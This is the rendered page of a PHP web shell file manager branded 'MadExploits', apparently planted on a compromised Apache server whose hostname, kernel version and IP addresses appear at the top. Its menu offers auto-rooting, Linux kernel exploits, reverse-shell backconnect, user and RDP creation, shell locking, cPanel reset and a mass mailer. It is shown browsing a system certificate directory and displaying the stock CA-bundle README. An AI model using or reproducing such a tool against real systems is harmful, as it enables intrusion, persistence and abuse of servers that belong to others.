Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.191.212.146
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
pki /
ca-trust /
extracted /
openssl /
[ HOME SHELL ]
Name
Size
Permission
Action
README
787
B
-rw-r--r--
ca-bundle.trust.crt
528.06
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
This directory /etc/pki/ca-trust/extracted/openssl/ contains CA certificate bundle files which are automatically created based on the information found in the /usr/share/pki/ca-trust-source/ and /etc/pki/ca-trust/source/ directories. All files are in the BEGIN/END TRUSTED CERTIFICATE file format, as described in the x509(1) manual page. If your application isn't able to load the PKCS#11 module p11-kit-trust.so, then you can use these files in your application to load a list of global root CA certificates. Please never manually edit the files stored in this directory, because your changes will be lost and the files automatically overwritten, each time the update-ca-trust command gets executed. Please refer to the update-ca-trust(8) manual page for additional information.
Close